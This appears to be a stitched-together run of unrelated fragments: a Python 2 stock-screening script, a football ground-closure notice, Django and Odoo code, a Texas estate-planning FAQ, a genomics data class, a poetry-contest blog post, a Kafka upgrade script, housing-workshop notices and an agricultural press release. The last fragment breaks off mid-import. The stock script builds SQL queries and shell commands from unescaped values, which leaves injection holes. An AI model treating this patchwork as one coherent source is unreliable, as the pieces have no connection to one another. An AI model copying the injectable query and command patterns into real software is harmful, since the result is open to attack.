cmd = "perl display_indicator.pl --timeframe=%s --nb=%s \
--tight I:SMA %s %s|grep -P '\[\d+-\d+\-\d+]*.*'" % (timeframe,dayago,symbol,sma)
if timeframe == 'week':
cmd = "perl display_indicator.pl --timeframe=%s --nb=%s \
--tight I:SMA %s %s|grep -P '\[\d+-\d+]*.*'" % (timeframe,dayago,symbol,sma)
if timeframe == 'month':
cmd = "perl display_indicator.pl --timeframe=%s --nb=%s \
--tight I:SMA %s %s| grep -P '\[\d+\/\d+]*.*'" % (timeframe,dayago,symbol,sma)
#print "DEBUG indicator_cmd = %s" % cmd
(status,output) = commands.getstatusoutput(cmd)
if status != 0:
return False
ind_list = output.split("\n")
base_point = ind_list[0].split("=")[1].strip()
if base_point !="":
last_point = ind_list[len(ind_list)-1].split("=")[1].strip()
change = (Decimal(last_point) - Decimal(base_point))/Decimal(base_point) * 100
change = Decimal(str(round(change, 3)))
else:
change = 0
return change
def scan_stock(conf_dir,stock_list,signal_file):
"""
"""
graph_dir = script_dir
ret_list = []
if len(stock_list) == 0 : return ret_list
timeframe="day"
if signal_file.find("week") != -1:
timeframe = "week"
elif signal_file.find("month") != -1:
timeframe = "month"
sig_file = "%s/%s" % (conf_dir,signal_file)
filename = "/dev/shm/%s" % (signal_file)
stock_FILE = open(filename,"w")
for symbol in stock_list:
stock_FILE.writelines(symbol+ "\n")
stock_FILE.close()
cmd = "cd %s;./scan.pl --nbprocess=4 --timeframe %s %s 'today' %s |sed -e '/^$/d' | sed -e '/Signal/d'" % (graph_dir,timeframe,filename,sig_file)
res = subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,close_fds=True)
error_log = res.stderr.readlines()
if len(error_log) !=0:
print "CMD = %s" % cmd
print "DEBUG : stderr = %s " % res.stderr.readlines()
for line in res.stdout.readlines():
symbol = line.split('\t')[0]
ret_list.append(symbol.strip())
return ret_list
def create_stock_list(stock_list,stock_region='US'):
"""
将符合条件的股票列表导出
"""
filename = "/home/hua.fu/geniustrader/Scripts/stock_%s_list" % (stock_region)
stock_FILE = open(filename,"w")
for symbol in stock_list:
stock_FILE.writelines(symbol+ "\n")
stock_FILE.close()
def filter_by_indicator(stock_list):
"""
根据技术指标筛选短期强于大盘的股票
"""
if action == "long":
filter_signal_file = ['buy_filter_new_high']
if action == "short":
filter_signal_file = ['sell_filter_new_low']
for sig_file in filter_signal_file:
stock_list = scan_stock(conf_dir,stock_list,sig_file)
if DEBUG: print "DEBUG: After Scan = %s" % len(stock_list)
return stock_list
def update_filter_stockdb(stock_db,data,country):
"""
将符合条件的股票保存到后续观察票池中
"""
new_list = []
(pool_db_cursor,pool_cx) = connect_pool_db(stock_db)
pool_cx.text_factory=str
lastupdate_time = int(time.time())
for symbol in data:
try:
sql_cmd = 'insert into stock values(NULL,"%s","%s",%s,%s)' % (symbol,country,lastupdate_time,lastupdate_time)
pool_db_cursor.execute(sql_cmd)
new_list.append(symbol)
except sqlite.IntegrityError,e:
sql_cmd = "update stock set lastupdate_time = '%s' where symbol='%s'" % (lastupdate_time,symbol)
pool_db_cursor.execute(sql_cmd)
except Exception as inst:
print "exception type = %s,Error = %s" % (type(inst),inst)
pool_cx.commit()
def get_buy_point(stock_db,buy_signal,country):
"""
扫描票池数据库,找到日线图买点
"""
(db_cursor,pool_cx) = connect_pool_db(stock_db)
pool_cx.text_factory=str
# 获取列表
sql = "select symbol from stock where country='%s'" % (country)
db_cursor.execute(sql)
rs = db_cursor.fetchall()
if len(rs) == 0 : return
stock_list = []
for item in rs:
symbol = item[0]
stock_list.append(symbol)
pool_cx.close()
# 扫描列表
scan_list = scan_stock(conf_dir,stock_list,buy_signal)
if DEBUG: print "DEBUG: Buy Point Signal = %s ,After Scan = %s" % (buy_signal,len(scan_list))
return scan_list
def compare_to_spy(wating_stock_list,peroid_offet_list,country):
"""
根据个股与大盘对比,选取强于大盘的个股
"""
cache_file = "%s/tmp/filter_%s" % (base_dir,country)
if not os.path.isfile(cache_file) or (int(time.time()) - int(os.stat(cache_file).st_mtime) >= 86000):
for peroid in peroid_offet_list:
(globals()['day_ago'],globals()['sma_day'],timeframe) = peroid
if DEBUG: print "DEBUG = Before filter count = %s" % len(wating_stock_list)
(long_stock_data,short_data) = calc_stock(wating_stock_list,country,timeframe)
(stock_list,pool_data) = sort_stock(long_stock_data)
if DEBUG: print "DEBUG = After filter count = %s" % len(stock_list)
wating_stock_list = stock_list
fout = open(cache_file, "w")
pickle.dump(stock_list, fout, protocol=0)
fout.close()
return stock_list
elif os.path.isfile(cache_file):
fin = open(cache_file, "r")
data = pickle.load(fin)
fin.close()
return data
def sendmail(msg):
""" send mail function """
SERVER = 'localhost'
FROM = 'hua.fu@alibaba-inc.com'
TO = ['hunterfu2009@gmail.com']
SUBJECT = 'Daily Stock Notify Report'
# Prepare actual message
message = """From: %s \nTo: %s\nSubject: %s \n
%s """ % (FROM, ", ".join(TO), SUBJECT, msg)
# Send the mail
try:
#server = smtplib.SMTP(host=SERVER,timeout=5)
server = smtplib.SMTP(host=SERVER)
server.sendmail(FROM, TO, message)
server.quit()
except Exception,e:
print 'Unable to send email ErrorMsg=%s' % e
def usage():
print '''
Usage: create_graph.py [options...]
Options:
-s/--action : long or short
-r/--region : the special region of stock [CHINA|US|HK|TRACK]
-e/--endday : scan stock endday [2011-10-1],default is today
-h/--help : this help info page
-d/--debug : run in debug mode
Example:
# default is checking all stock which in monitor db
monitor_stock.py
# debug special stock
monitor_stock.py -s ras
# setting stock support line and resistance_line
monitor_stock.py -s ras -l 2.44,2.48
# setting stock channel,maybe uptrend or downtrend
monitor_stock.py -s ras -c 2010-07-01,2010-07-02,2010-07-03
'''
def main():
""" main function """
#各个变量保存
scan_signal_file = "signal_file"
stock_region =""
timeframe ="day"
endday = "today"
#global clientpool,action
global DEBUG
DEBUG = False
global base_index
base_index = {}
base_index['CHINA'] = ["上证指数","000001.SS"]
base_index['US'] = ["标普500","^GSPC"]
global base_dir,action,img_out_dir,script_dir
base_dir = os.path.abspath(os.path.dirname(sys.argv[0]))
img_out_dir = "%s/img_out" % (base_dir)
script_dir = "%s/GeniusTrader/Scripts" % (base_dir)
stock_db = "%s/db/stock_db" % (base_dir)
# 票池
stock_pool = "%s/db/stock_pool" % (base_dir)
# 筛选周期
global day_ago,sma_day,conf_dir
(day_ago,sma_day) = (30,200)
peroid_offet_list = [(30,200,'day'),(30,50,'day')]
conf_dir = "%s/conf" % (base_dir)
template_file = "%s/template/stock_template.html" % (base_dir)
db_cursor = None
cx = None
(db_cursor,cx) = connect_db(stock_db)
cx.text_factory=str
try:
opts, args = getopt.getopt(sys.argv[1:],'dhs:r:e:')
except getopt.GetoptError:
usage()
sys.exit()
for opt, arg in opts:
if opt in ('-h', '--help'):
usage()
sys.exit()
elif opt == '-s':
scan_signal_file = arg
elif opt == '-e':
endday = arg
elif opt == '-d':
DEBUG = True
elif opt == '-r':
stock_region = arg
stock_region = stock_region.upper()
export_stock_symbol(db_cursor,cx)
if not scan_signal_file:
print "please setting long or short using -s"
sys.exit()
if scan_signal_file not in ['long','short']:
print "Input Action Not Correct,Please Check"
sys.exit()
action = scan_signal_file
region = []
if stock_region:
if stock_region not in ['CHINA','US','HK']:
print "Input Region Not Correct,Please Check"
sys.exit()
region.append(stock_region)
else:
region = ['CHINA','US','HK']
os.system("rm -fr /home/hua.fu/geniustrader/output/*")
for country in region:
#stock_list=['A','FSLR']
#create_graph(stock_list,template_file,conf_dir,country,"TESsig_file",endday)
#sys.exit(0)
# 根据大盘过滤出强于大盘的个股
#wating_stock_list = get_stock_list(db_cursor,cx,country)
#stock_list = compare_to_spy(wating_stock_list,peroid_offet_list,country)
#stock_list = stock_list[:50]
#create_graph(stock_list,template_file,conf_dir,country,"all",endday)
#sys.exit(0)
# 根据月线过滤kdj再底部cross的
wating_stock_list = get_stock_list(db_cursor,cx,country)
stock_list = wating_stock_list
data = filter_by_indicator(stock_list)
create_graph(data,template_file,conf_dir,country,"all",endday)
sys.exit(0)
# 更新到票池数据库中
update_filter_stockdb(stock_pool,data,country)
# 跟踪扫描日线,找到买点
filter_signal_file = ['buy_point_signal_one','buy_point_signal_two','buy_point_signal_three']
for sig_file in filter_signal_file:
stock_list = get_buy_point(stock_pool,sig_file,country)
# 画图
if len(stock_list) > 0:
create_graph(stock_list,template_file,conf_dir,country,sig_file,endday)
#create_stock_list(stock_list,country)
#sys.exit(0)
if __name__ == "__main__":
main()
#sys.exit(0)
#stocklist = ['A','BAC','FSLR']
#filter_list = scan_stock("/home/hua.fu/it-manager/stock_tech/conf",stocklist,"buy_signal_kdj_cross_month","US")
#print filter_list
#print get_indicator_output('000001.SS',30,30,'day')
#print get_indicator_output('^GSPC',30,30,'week')
#print get_indicator_output('^GSPC',30,30,'month')
#result_data = []
#stocklist = ['A','BAC','FSLR']
#t = ind_runs(-10,result_data,stocklist)
#t.start()
#threading.Thread.join(t)
#print result_data
|
12 June 2015, 6PM: Polwarth Dr 1 is CLOSED for all matches on Saturday 13th June 2015. All matches will be played on P2.
Rain does not automatically call off games, however the AMOUNT of rain does. In the event of wet weather you will receive an email advising if Polwarth Drive is open or closed. Coaches will also receive a text. Please check Facebook as well as website. For all other ground closures check North Coast Football.
Please check each Thursday morning for a report on ground conditions for Thursday training and Friday night for Saturday games.
Ground closures and other advice will be communicated on Facebook when known. Please join our Facebook site for your immediate updates.
Ground closures are based upon the condition of the field playing surfaces for games, and NOT whether if is raining or not.
Several days of rain can be more damaging (creating a soft surface) than a single heavy downpour (which mostly runs off).
The fact it is raining on Saturday morning may not close the grounds if it is light and has only just commenced.
Also note that we can only advise the closure of Polwarth Drive fields. If you are playing away, then you need to check the North Coast Football website for closures at other clubs.
|
from django.db import models
from django.core.urlresolvers import reverse
from django.contrib.contenttypes.models import ContentType
try: # new import added in Django 1.7
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.fields import GenericRelation
except ImportError:
from django.contrib.contenttypes import generic
GenericForeignKey = generic.GenericForeignKey
GenericRelation = generic.GenericRelation
import dumper
class LoggingModel(models.Model):
text = models.CharField(max_length=200)
def __unicode__(self):
return self.text
class SimpleModel(models.Model):
slug = models.CharField(max_length=200, default='slug')
def get_absolute_url(self):
return reverse('simple-detail', kwargs={'slug': self.slug})
def dependent_paths(self):
yield self.get_absolute_url()
for model in self.related_set.all():
yield model.get_absolute_url()
class RelatedModel(models.Model):
slug = models.CharField(max_length=200, default='slug')
related = models.ManyToManyField(SimpleModel, related_name='related_set')
def dependent_paths(self):
yield self.get_absolute_url()
def get_absolute_url(self):
return reverse('related-detail', kwargs={'slug': self.slug})
class GenericRelationModel(models.Model):
slug = models.CharField(max_length=200, default='slug')
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
def dependent_paths(self):
yield self.content_object.get_absolute_url()
class RelatedToGenericModel(models.Model):
slug = models.CharField(max_length=200, default='slug')
generic_related = GenericRelation(GenericRelationModel)
def get_absolute_url(self):
return reverse('related-to-generic-detail', kwargs={'slug': self.slug})
class GenericRelationNotRegisteredModel(models.Model):
slug = models.CharField(max_length=200, default='slug')
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
def dependent_paths(self):
pass
dumper.register(SimpleModel)
dumper.register(RelatedModel)
dumper.register(GenericRelationModel)
|
Time to make a scene.
A BRAND NEW LEAFY STENCIL!
Build a fence, then climb over it.
I really must stop horsing around….
|
# -*- coding: utf8 -*-
#
# Copyright (C) 2014 NDP Systèmes (<http://www.ndp-systemes.fr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
#
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
{
'name': 'Stock Move Scheduling on Working Days',
'version': '0.1',
'author': 'NDP Systèmes',
'maintainer': 'NDP Systèmes',
'category': 'Warehouse',
'depends': ['resource','procurement','stock'],
'description': """
Stock Move Scheduling on Working Days
=====================================
This modules enables scheduling of procurements on working days defined by resources and associated calendars.
Each warehouse can have its own resource and associated calendar representing its opening days. If a warehouse is not
given a resource, then the system falls back to a company default calendar.
When a procurement needs to be scheduled by stock move, it counts only opened days defined by the
applicable calendar.
This module also enables that procurement rules of type "move" be triggered only on fixed days of the week. This is
particularly useful for scheduling chained moves where some activities are only performed on certain days (e.g.
transport between 2 warehouses only done twice a week on mondays and thursdays).
Notes:
------
- When no applicable calendar is found, the module's default calendar is used which sets working days from Monday to
Friday. This default calendar can be changed by authorized users.
- For a given procurement, the applicable warehouse is the warehouse of the location of the procurement. It falls back
on the warehouse of the procurement itself only if no location is defined. This is to handle correctly
inter-warehouse procurement with chained moves where the warehouse of the procurement is the warehouse of the end of
the chain.
""",
'website': 'http://www.ndp-systemes.fr',
'data': [
'security/ir.model.access.csv',
'stock_working_days_data.xml',
'stock_working_days_view.xml',
],
'demo': [
'stock_working_days_demo.xml',
],
'test': [],
'installable': True,
'auto_install': False,
'license': 'AGPL-3',
'application': False,
}
|
A: Many people believe that if there is no Will, all their assets will be distributed to their surviving spouse. If you do not create a valid Will, the state of Texas has a statute that will dictate where your assets go and who will administer your estate. If there are children from a previous marriage they automatically become primary heirs, a head of the surviving spouse. So, Texas law isn’t as simple as “community property”.
A: Probate is a court proceeding to transfer title from the decedent’s name to the living beneficiaries. Probate occurs in the state of your legal residence as well as any state where you own real property. The length of time to complete a Probate varies from state to state, but can take six to eighteen months, on average. Probate is frustrating to the heirs and is public record.
A: A Revocable Trust serves a number of purposes. One important purpose is that assets in the trust will not be subject to probate administration. This is accomplished by transferring your assets out of your name as individuals and placing them into a Trust, which you control. As a result, you have no assets in your estate therefore no need to have anything probated.
After your passing the Trust dictates the distribution of your assets, in a similar fashion to an old fashioned Will. However, with a Trust you can hold assets back to be distributed throughout a specific period of time. This prevents irresponsible heirs from receiving a lump sum windfall.
A: If you already have an estate plan, it should not be considered permanent. Conditions, as well as your desires, may change. Estate plans should be reviewed at least every two-three years but, additionally, any important change in your life demands immediate review.
A: Yes. If you do not have assets in your name or are proactive and plan while you still have capacity, you and your loved ones can avoid probate court. Contact our office for a complimentary evaluation of your assets.
A: Although your spouse is entitled to assets from your estate, if you have not planned correctly, your spouse will likely be subject to the probate court and its control.
A: The cost of an estate plan can vary depending on your situation and who you hire. Unless there is a dispute among the family members I can normally quote a set fee for all services, but I always suggest you come in for a complimentary consultation so we can discuss your specific situation.
A: This is probably my most commonly asked question. The real answer is that it depends specifically on your situation. Are you looking to completely avoid probate? Do you have multiple pieces of real estate in different counties or even a single piece of real estate in another state? Are your beneficiaries and/or executors living in another state? All of these questions help me to understand your situation to know whether you need one or the other.
|
"""
DATA:
-----------------------------
| | cid |
-----------------------------
| | |
|r | |
|i | data |
|d | |
| | |
-----------------------------
ROW METADATA:
--------------------------
|id| rhd |
--------------------------
| | |
|r | |
|i | row_metadata |
|d | |
| | |
--------------------------
COLUMN METADATA:
N.B. The df is transposed from how it looks in a gct file.
---------------------
|id| chd |
---------------------
| | |
| | |
| | |
|c | |
|i | col_metadata |
|d | |
| | |
| | |
| | |
---------------------
N.B. rids, cids, rhds, and chds must be:
- unique
- matching in both content & order everywhere they're found
"""
import numpy as np
import pandas as pd
import logging
import cmapPy.pandasGEXpress.setup_GCToo_logger as setup_logger
__authors__ = 'Oana Enache, Lev Litichevskiy, Dave Lahr'
__email__ = 'dlahr@broadinstitute.org'
class GCToo(object):
"""Class representing parsed gct(x) objects as pandas dataframes.
Contains 3 component dataframes (row_metadata_df, column_metadata_df,
and data_df) as well as an assembly of these 3 into a multi index df
that provides an alternate way of selecting data.
"""
def __init__(self, data_df, row_metadata_df=None, col_metadata_df=None,
src=None, version=None, make_multiindex=False, logger_name=setup_logger.LOGGER_NAME):
self.logger = logging.getLogger(logger_name)
self.src = src
self.version = version
# Check data_df before setting
self.check_df(data_df)
self.data_df = data_df
if row_metadata_df is None:
self.row_metadata_df = pd.DataFrame(index=data_df.index)
else:
# Lots of checks will occur when this attribute is set (see __setattr__ below)
self.row_metadata_df = row_metadata_df
if col_metadata_df is None:
self.col_metadata_df = pd.DataFrame(index=data_df.columns)
else:
# Lots of checks will occur when this attribute is set (see __setattr__ below)
self.col_metadata_df = col_metadata_df
# Create multi_index_df if explicitly requested
if make_multiindex:
self.assemble_multi_index_df()
else:
self.multi_index_df = None
# This GCToo object is now initialized
self._initialized = True
def __setattr__(self, name, value):
# Make sure row/col metadata agree with data_df before setting
if name in ["row_metadata_df", "col_metadata_df"]:
self.check_df(value)
if name == "row_metadata_df":
self.id_match_check(self.data_df, value, "row")
value = value.reindex(self.data_df.index)
super(GCToo, self).__setattr__(name, value)
else:
self.id_match_check(self.data_df, value, "col")
value = value.reindex(self.data_df.columns)
super(GCToo, self).__setattr__(name, value)
# When reassigning data_df after initialization, reindex row/col metadata if necessary
# N.B. Need to check if _initialized is present before checking if it's true, or code will break
elif name == "data_df" and "_initialized" in self.__dict__ and self._initialized:
self.id_match_check(value, self.row_metadata_df, "row")
self.id_match_check(value, self.col_metadata_df, "col")
super(GCToo, self).__setattr__("row_metadata_df", self.row_metadata_df.reindex(value.index))
super(GCToo, self).__setattr__("col_metadata_df", self.col_metadata_df.reindex(value.columns))
super(GCToo, self).__setattr__(name, value)
# Can't reassign multi_index_df after initialization
elif name == "multi_index_df" and "_initialized" in self.__dict__ and self._initialized:
msg = ("Cannot reassign value of multi_index_df attribute; " +
"if you'd like a new multiindex df, please create a new GCToo instance" +
"with appropriate data_df, row_metadata_df, and col_metadata_df fields.")
self.logger.error(msg)
raise Exception("GCToo.__setattr__: " + msg)
# Otherwise, use the normal __setattr__ method
else:
super(GCToo, self).__setattr__(name, value)
def check_df(self, df):
"""
Verifies that df is a pandas DataFrame instance and
that its index and column values are unique.
"""
if isinstance(df, pd.DataFrame):
if not df.index.is_unique:
repeats = df.index[df.index.duplicated()].values
msg = "Index values must be unique but aren't. The following entries appear more than once: {}".format(repeats)
self.logger.error(msg)
raise Exception("GCToo GCToo.check_df " + msg)
if not df.columns.is_unique:
repeats = df.columns[df.columns.duplicated()].values
msg = "Columns values must be unique but aren't. The following entries appear more than once: {}".format(repeats)
raise Exception("GCToo GCToo.check_df " + msg)
else:
return True
else:
msg = "expected Pandas DataFrame, got something else: {} of type: {}".format(df, type(df))
self.logger.error(msg)
raise Exception("GCToo GCToo.check_df " + msg)
def id_match_check(self, data_df, meta_df, dim):
"""
Verifies that id values match between:
- row case: index of data_df & index of row metadata
- col case: columns of data_df & index of column metadata
"""
if dim == "row":
if len(data_df.index) == len(meta_df.index) and set(data_df.index) == set(meta_df.index):
return True
else:
msg = ("The rids are inconsistent between data_df and row_metadata_df.\n" +
"data_df.index.values:\n{}\nrow_metadata_df.index.values:\n{}").format(data_df.index.values, meta_df.index.values)
self.logger.error(msg)
raise Exception("GCToo GCToo.id_match_check " + msg)
elif dim == "col":
if len(data_df.columns) == len(meta_df.index) and set(data_df.columns) == set(meta_df.index):
return True
else:
msg = ("The cids are inconsistent between data_df and col_metadata_df.\n" +
"data_df.columns.values:\n{}\ncol_metadata_df.index.values:\n{}").format(data_df.columns.values, meta_df.index.values)
self.logger.error(msg)
raise Exception("GCToo GCToo.id_match_check " + msg)
def __str__(self):
"""Prints a string representation of a GCToo object."""
version = "{}\n".format(self.version)
source = "src: {}\n".format(self.src)
data = "data_df: [{} rows x {} columns]\n".format(
self.data_df.shape[0], self.data_df.shape[1])
row_meta = "row_metadata_df: [{} rows x {} columns]\n".format(
self.row_metadata_df.shape[0], self.row_metadata_df.shape[1])
col_meta = "col_metadata_df: [{} rows x {} columns]".format(
self.col_metadata_df.shape[0], self.col_metadata_df.shape[1])
full_string = (version + source + data + row_meta + col_meta)
return full_string
def assemble_multi_index_df(self):
"""Assembles three component dataframes into a multiindex dataframe.
Sets the result to self.multi_index_df.
IMPORTANT: Cross-section ("xs") is the best command for selecting
data. Be sure to use the flag "drop_level=False" with this command,
or else the dataframe that is returned will not have the same
metadata as the input.
N.B. "level" means metadata header.
N.B. "axis=1" indicates column annotations.
Examples:
1) Select the probe with pr_lua_id="LUA-3404":
lua3404_df = multi_index_df.xs("LUA-3404", level="pr_lua_id", drop_level=False)
2) Select all DMSO samples:
DMSO_df = multi_index_df.xs("DMSO", level="pert_iname", axis=1, drop_level=False)
"""
#prepare row index
self.logger.debug("Row metadata shape: {}".format(self.row_metadata_df.shape))
self.logger.debug("Is empty? {}".format(self.row_metadata_df.empty))
row_copy = pd.DataFrame(self.row_metadata_df.index) if self.row_metadata_df.empty else self.row_metadata_df.copy()
row_copy["rid"] = row_copy.index
row_index = pd.MultiIndex.from_arrays(row_copy.T.values, names=row_copy.columns)
#prepare column index
self.logger.debug("Col metadata shape: {}".format(self.col_metadata_df.shape))
col_copy = pd.DataFrame(self.col_metadata_df.index) if self.col_metadata_df.empty else self.col_metadata_df.copy()
col_copy["cid"] = col_copy.index
transposed_col_metadata = col_copy.T
col_index = pd.MultiIndex.from_arrays(transposed_col_metadata.values, names=transposed_col_metadata.index)
# Create multi index dataframe using the values of data_df and the indexes created above
self.logger.debug("Data df shape: {}".format(self.data_df.shape))
self.multi_index_df = pd.DataFrame(data=self.data_df.values, index=row_index, columns=col_index)
def multi_index_df_to_component_dfs(multi_index_df, rid="rid", cid="cid"):
""" Convert a multi-index df into 3 component dfs. """
# Id level of the multiindex will become the index
rids = list(multi_index_df.index.get_level_values(rid))
cids = list(multi_index_df.columns.get_level_values(cid))
# It's possible that the index and/or columns of multi_index_df are not
# actually multi-index; need to check for this and there are more than one level in index(python3)
if isinstance(multi_index_df.index, pd.MultiIndex):
# check if there are more than one levels in index (python3)
if len(multi_index_df.index.names) > 1:
# If so, drop rid because it won't go into the body of the metadata
mi_df_index = multi_index_df.index.droplevel(rid)
# Names of the multiindex levels become the headers
rhds = list(mi_df_index.names)
# Assemble metadata values
row_metadata = np.array([mi_df_index.get_level_values(level).values for level in list(rhds)]).T
# if there is one level in index (python3), then rhds and row metadata should be empty
else:
rhds = []
row_metadata = []
# If the index is not multi-index, then rhds and row metadata should be empty
else:
rhds = []
row_metadata = []
# Check if columns of multi_index_df are in fact multi-index
if isinstance(multi_index_df.columns, pd.MultiIndex):
# Check if there are more than one levels in columns(python3)
if len(multi_index_df.columns.names) > 1:
# If so, drop cid because it won't go into the body of the metadata
mi_df_columns = multi_index_df.columns.droplevel(cid)
# Names of the multiindex levels become the headers
chds = list(mi_df_columns.names)
# Assemble metadata values
col_metadata = np.array([mi_df_columns.get_level_values(level).values for level in list(chds)]).T
# If there is one level in columns (python3), then rhds and row metadata should be empty
else:
chds = []
col_metadata = []
# If the columns are not multi-index, then rhds and row metadata should be empty
else:
chds = []
col_metadata = []
# Create component dfs
row_metadata_df = pd.DataFrame.from_records(row_metadata, index=pd.Index(rids, name="rid"), columns=pd.Index(rhds, name="rhd"))
col_metadata_df = pd.DataFrame.from_records(col_metadata, index=pd.Index(cids, name="cid"), columns=pd.Index(chds, name="chd"))
data_df = pd.DataFrame(multi_index_df.values, index=pd.Index(rids, name="rid"), columns=pd.Index(cids, name="cid"))
return data_df, row_metadata_df, col_metadata_df
|
2014 Children’s Poetry Celebration & Contest PLUS Cinquain Poems!!
April is National Poetry Month! In celebration we’ll be sharing about CINQUAIN POEMS today, but first we want to tell you about the awesome drawing and poetry contest created by Preschool Powol Packets!
During April, co-hosting blogs (like ours!) will post about poetry. Comment on these posts to be entered in a DRAWING for a POETRY PRIZE. An additional entry is available for following host blogs on Facebook (for instance, if you follow Brave Writer, comment here so the entry can be counted).
There’s also a cool Poetry Contest for kids! Children can enter one or two original poems (30 lines or shorter) in one of the following age categories: 4-6, 7-9, 10-12. Entries will be accepted any time during the month of April via a form at Preschool Powol Packets. Poems will be judged on creativity, originality, style, and language. Judging may be subjective and all decisions are final. This year’s contest will be judged by the lovely Becky at This Reading Mama. More info at Preschool Powol Packets.
taught by our very own Susanne Barrett.
A Cinquain is a five-lined poem (hence the name!) and is a favorite poetic form for many kids because, as one of our students pointed out, “they are easy and fun to write and they don’t require a whole lot of words!” They also reinforce some basic grammatical parts of speech.
Sometimes each line is centered to create a diamond or tree-like shape.
Students may capitalize all the words, none of the words, the first words of each line, or just certain words. And each poem may be capitalized differently, depending on its subject matter, diction (word choice), etc. Just see which way feels the best to you for each poem. Also, slight variations of syllables are okay.
If your kids write a Cinquain poem, they can submit it to the 2014 Children’s Poetry Celebration & Contest.
Prize details are at Preschool Powol Packets (Psst! Brave Writer has donated our Arrow Poetry Guide).
This entry is filed under Contests / Giveaways, Poetry. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.
I follow BraveWriter on FB!
I think we’ll use the cinquain poetry format today as a way to review our language arts skills. I love writing cinquain poems. I can’t wait to see what topic my daughter chooses to write about today! Great post with example of how to differentiate for older learners.
I love how accessible you make cinquains! We’ll be writing some this afternoon! Thanks for a fabulous post!!
Did not know what a Cinquain poem was until today. Learn something everyday. It so happens we are doing the Arrow Poetry this month. Perfect timing.
What a great syle for young kids! We just wrote haikus today which slso you syllables.
This is a great idea. I can’t wait to tell my kids about the poetry contest tomorrow at our poetry tea time. Thanks for sharing.
I’ve never heard of cinquain poems before. maybe we’ll try them at our next poetry club. thanks!
|
#!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from resource_management import *
from resource_management.core.resources.system import Execute
from resource_management.libraries.functions import Direction
from resource_management.libraries.functions.format import format
from resource_management.libraries.script.script import Script
class KafkaUpgrade(Script):
def copy_kerberos_param(self,env):
import params
kafka_run_path = "/usr/iop/4.1.0.0/kafka/bin/kafka-run-class.sh"
if params.upgrade_direction is not None and params.upgrade_direction == Direction.UPGRADE:
Execute(("sed", "-i", "s/\$CLASSPATH \$KAFKA_OPTS/\$CLASSPATH \$KAFKA_OPTS \$KAFKA_KERBEROS_PARAMS/", kafka_run_path), logoutput=True)
if __name__ == "__main__":
KafkaUpgrade().execute()
|
Check out our upcoming classes and events in the calendar below. To register simply click on the event of your choice and complete the registration form.
This HUD-approved Homebuyer Education Workshop is taught in our Oxnard office in a group setting by our certified Homeownership Specialists who are trained to guide attendees through the complex homebuying process.
Center staff will be available to answer your questions!
Our homes play a critical role in shaping our health and the health of the whole community.
Learn more about the connection between health and housing along with some great tips on how to prioritize healthy eating in your family!
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import models, api, fields
from odoo.tools.translate import _
class SaleOrder(models.Model):
_inherit = 'sale.order'
warning_stock = fields.Char('Warning')
def _cart_update(self, product_id=None, line_id=None, add_qty=0, set_qty=0, **kwargs):
values = super(SaleOrder, self)._cart_update(product_id, line_id, add_qty, set_qty, **kwargs)
line_id = values.get('line_id')
for line in self.order_line:
if line.product_id.type == 'product' and line.product_id.inventory_availability in ['always', 'threshold']:
cart_qty = sum(self.order_line.filtered(lambda p: p.product_id.id == line.product_id.id).mapped('product_uom_qty'))
if cart_qty > line.product_id.virtual_available and (line_id == line.id):
qty = line.product_id.virtual_available - cart_qty
new_val = super(SaleOrder, self)._cart_update(line.product_id.id, line.id, qty, 0, **kwargs)
values.update(new_val)
# Make sure line still exists, it may have been deleted in super()_cartupdate because qty can be <= 0
if line.exists() and new_val['quantity']:
line.warning_stock = _('You ask for %s products but only %s is available') % (cart_qty, new_val['quantity'])
values['warning'] = line.warning_stock
else:
self.warning_stock = _("Some products became unavailable and your cart has been updated. We're sorry for the inconvenience.")
values['warning'] = self.warning_stock
return values
@api.multi
def _website_product_id_change(self, order_id, product_id, qty=0):
res = super(SaleOrder, self)._website_product_id_change(order_id, product_id, qty=qty)
product = self.env['product.product'].browse(product_id)
res['customer_lead'] = product.sale_delay
return res
@api.multi
def _get_stock_warning(self, clear=True):
self.ensure_one()
warn = self.warning_stock
if clear:
self.warning_stock = ''
return warn
class SaleOrderLine(models.Model):
_inherit = 'sale.order.line'
warning_stock = fields.Char('Warning')
@api.multi
def _get_stock_warning(self, clear=True):
self.ensure_one()
warn = self.warning_stock
if clear:
self.warning_stock = ''
return warn
|
Cultiva®, manufacturer of Parka®, the industry’s first patented food-grade cuticle supplement used to protect cherries, apples, grapes, blueberries and other premium fruit throughout the world, announces a distribution partnership with Arysta LifeScience Chile. Arysta LifeScience is a global provider of crop protection and yield-enhancing products in more than 60 countries with South American offices in Chile, Argentina, Bolivia, Brazil, and Colombia.
Cultiva partnered with Oregon State University nearly a decade ago to launch the agricultural industry’s first ever food-grade cuticle supplement for premium fruit production. The company has taken an industry leading role in educating growers and crop consultants about how the cuticle impacts fruit yields, fruit quality, and decreases the need for crop protection chemicals. The company is also presently investigating how Parka can increase shelf life in food storage facilities and grocery stores.
|
from datetime import datetime
from decimal import Decimal
import itertools
import jsonfield
from django.db import models
from django.utils.translation import ugettext as _
from couchdbkit.exceptions import ResourceNotFound
from dimagi.ext.couchdbkit import (
Document,
StringProperty,
